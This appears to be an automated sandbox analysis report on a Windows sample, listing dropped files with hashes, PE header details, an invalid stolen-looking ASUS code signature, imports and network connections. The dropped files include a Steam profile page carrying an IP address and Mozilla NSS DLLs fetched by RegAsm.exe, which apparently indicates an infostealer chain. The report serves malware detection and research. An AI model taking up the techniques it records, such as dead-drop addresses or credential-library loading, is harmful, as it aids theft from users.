Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Apr 24 14:47:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	37230
Entropy (8bit):	1.827338721609437
Encrypted:	false
SSDEEP:	96:5n8lKE3q6L5jQAD5CCKeCg8Tti7qL6BGX5yB1SGPpAOfuOfMh/PvUPgWIkWIF4Ig:WL7iNtOUJyBkGPp1uOfnPMn1Cop4nyx
MD5:	3B5F455764B05C8948CC80E3042B94DE
SHA1:	5C568C94B4AF0182B5E0AC40CE5902CA013D58A5
SHA-256:	3665341AABA0EB302596AAA343992EDB7AEE167C7E0D977CAB913000CCAB4AB0
SHA-512:	91004614A9A59833E75E42818711EC1038E3673E3F274D6911A092262496C9F7149AFEB85209A98DC21586E6ED4E959C9ECC4FCBDDC7C55C6D642D1A1CC29D7A
Malicious:	false
Preview:	MDMP..a..... .........)f....................................................T.......8...........T...........H...&...........`...........L...............................................................................eJ..............GenuineIntel............T.............)f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8A6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8334
Entropy (8bit):	3.698256472070795
Encrypted:	false
SSDEEP:	192:R6l7wVeJSC863W6Y9QSU9frgmfBXJJySprl89bvzsfU6RFm:R6lXJK63W6YqSU9frgmfxJJy1vYf5K
MD5:	BC2F2FECBF743A2FB96BFF2FDBF5A419
SHA1:	E0ED615BB2AF4B39471DD7F6AF92F70E3EBCB6CD
SHA-256:	D00805325F8EC4C23510825DD294E795A990F825E9E9DC00E713BF041C877A8D
SHA-512:	12C60718BCD6FE2A45BDADFB12740FFCC86581B426C1111173F382A06C3B952460FF60AF34F255EFD82CEE693F5ADFB2DA7CE063C510CFA205641FD6BEA08C7B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8C7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4605
Entropy (8bit):	4.4855337080396005
Encrypted:	false
SSDEEP:	48:cvIwWl8zs7tJg77aI95GWpW8VYuAYm8M4JRDFNr+q87oWzhdd:uIjfLI7HH7VFJxr3Wzhdd
MD5:	568C1FD62CCF4866720DED69B125DE59
SHA1:	BCB093DB029D7BED37CB1D6DCBACE93D1F335DB3
SHA-256:	8E7D66C2D8F1DA07AEADF7489D0E9874E961F54ABDFFFB986F6D02924F08E504
SHA-512:	7BD61655BF2EC506E0DABE072DD9A9136FF5F8DFD7911667E31EB397735B2F67C06E4F08F95B87A378ADBCF723CEB41C728F02424658A3DAF8709CDA57663C67
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="294110" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199677575543[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33805
Entropy (8bit):	5.437270173230065
Encrypted:	false
SSDEEP:	768:ndpqm+0Iz3YAA9CWG6WfcDAgZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2Sh:nd8m+0Iz3YAA9CWG6WFgZ4VWBCW3KI8P
MD5:	67138E8BC3178ADE7F4387E587B9D0C4
SHA1:	69A6BF80CAF5518505B75484EB7A9D1E2B87B0D0
SHA-256:	BF287BA433DF3B5F401E0EF85F88EE9FC957CDEF7B7F8685348AC749958E4D9D
SHA-512:	C92DA06B998420477F476DC0ABFEA074765D767531080001FB92DC7573768DB671BE833BA58B75C767455447E5783DA8E0013C2A6E3E78E623CB3BFECD91DE80
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: nve7n2 https://95.217.246.168\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465287825086034
Encrypted:	false
SSDEEP:	6144:rIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbx:sXD94+WlLZMM6YFH1+x
MD5:	15BE46EF3B58AC908336865CED01B657
SHA1:	AD104ED206425AFB0F8F121F36F1CB1CED38CF7B
SHA-256:	AD725F3E2B1AAB9A08B55D4F07BDB0A8746574DF9CE684CACE8632BBCF854F77
SHA-512:	74655C8EE8734F38ECEB446BF681129EDCE14547D10B0F5ACF481C3CA3DF97D676C680FFDF15A734E2EEC3CC1265D5A3240285DFA32621EC067FF04FDB93B85D
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN=!fV................................................................................................................................................................................................................................................................................................................................................17R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.3779082111150895
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'129'584 bytes
MD5:	fcc226702f89fb80675c9b20156500f3
SHA1:	0f8b46119867e39e95de3b2f3b1aaa9784c2664d
SHA256:	c84f8c3f58c2d8193d9f78cffb67205037b48b66c1287e06413f11cbe0e16038
SHA512:	9e2a6c8a78094e8429185a9a479f41b9fc3053b8fca9a10ddc6529394970298fb68b2a4b70dd2a2929d8cbe3cce9e7e022b1dcfe7ea68e408aca71dda95e7ca2
SSDEEP:	24576:62vl0F/StbaUTIFxUmKhG3v99vrLdG1qqdLGI+Y8gt:62d0FbUTIFxUmKhGVJLA1qqIPY8U
TLSH:	8D35AE3179849176EDE320B743ECF63A82BDE4B0071556CF06D85BEED6606C26F32686
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9.N\|W.N\|W.N\|W...T.E\|W...R..\|W...S.[\|W...S.\\|W...T.Z\|W...V.K\|W.N\|V..\|W...R..\|W...R.O\|W...U.O\|W.RichN\|W........................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4011cc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6628F3ED [Wed Apr 24 11:58:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	6ba3dc6c76522b49c5ecdb4d22c4531e

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	08/10/2020 01:00:00 12/10/2023 13:00:00
Subject Chain	CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
Version:	3
Thumbprint MD5:	332CDC164B1324C3FF3F64E228C5FFFC
Thumbprint SHA-1:	CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
Thumbprint SHA-256:	531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
Serial:	0C9838F673F9B1CCE395CFAB2B6684E4

Entrypoint Preview

Instruction
jmp 00007F5D3C854A21h
jmp 00007F5D3C86DF3Dh
jmp 00007F5D3C853FB8h
jmp 00007F5D3C85CFB5h
jmp 00007F5D3C847D5Bh
jmp 00007F5D3C8333EBh
jmp 00007F5D3C8B3FE6h
jmp 00007F5D3C848257h
jmp 00007F5D3C86ECFDh
jmp 00007F5D3C8BC390h
jmp 00007F5D3C82E497h
jmp 00007F5D3C855B65h
jmp 00007F5D3C82CF46h
jmp 00007F5D3C865AE2h
jmp 00007F5D3C841156h
jmp 00007F5D3C826839h
jmp 00007F5D3C88B8E3h
jmp 00007F5D3C830A06h
jmp 00007F5D3C8A8DEEh
jmp 00007F5D3C825FF5h
jmp 00007F5D3C86944Eh
jmp 00007F5D3C885E9Ch
jmp 00007F5D3C84500Ch
jmp 00007F5D3C8774E4h
jmp 00007F5D3C84F728h
jmp 00007F5D3C85DB7Fh
jmp 00007F5D3C828A92h
jmp 00007F5D3C881CABh
jmp 00007F5D3C8B6D4Fh
jmp 00007F5D3C83F4BBh
jmp 00007F5D3C855FD2h
jmp 00007F5D3C88B8AEh
jmp 00007F5D3C8B12E4h
jmp 00007F5D3C8A404Ah
jmp 00007F5D3C89E364h
jmp 00007F5D3C841650h
jmp 00007F5D3C85DA9Ch
jmp 00007F5D3C876CC3h
jmp 00007F5D3C876CAAh
jmp 00007F5D3C854002h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10e200	0x3c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x111600	0x2670	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x110000	0x4854	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc2c50	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc2b68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10e000	0x200	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb4e64	0xb5000	aed50eddd873bf9830ff217b516e2ddd	False	0.333100882683011	data	5.813572262715948	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb6000	0x14afc	0x14c00	571df6c6989b61cee4c51eda57e1e705	False	0.2868269954819277	data	3.699057946087329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcb000	0x429e8	0x41000	8b5a62be3724badad80ef65338679f18	False	0.8081355168269231	data	7.206628346711107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x10e000	0xc8a	0xe00	b5404b6c1efd012a54f02dc0d9188a2d	False	0.32589285714285715	data	4.37878772418462	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x10f000	0x10e	0x200	693e92a66f79b6cd96671abbe1debf1c	False	0.03515625	data	0.11055713125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x110000	0x5547	0x5600	17b1fc8c4447ed2209da566273e0e27d	False	0.6403070494186046	data	6.0515932148524785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

SHELL32.dll

DragFinish

KERNEL32.dll

LoadLibraryExW, CreateFileW, VirtualProtectEx, FormatMessageA, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, LocalFree, GetLocaleInfoEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, HeapSize, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, WriteConsoleW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetCurrentThread, HeapAlloc, HeapFree, GetFileType, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, SetConsoleCtrlHandler, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 16:47:58.892842054 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:58.892880917 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:58.892945051 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:58.901671886 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:58.901693106 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.242343903 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.242419004 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.323750973 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.323776007 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.324233055 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.324296951 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.331306934 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.376113892 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.737503052 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.737534046 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.737552881 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.737699032 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.737699032 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.737718105 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.737772942 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.894325972 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.894376040 CEST	443	49731	96.17.209.196	192.168.2.4
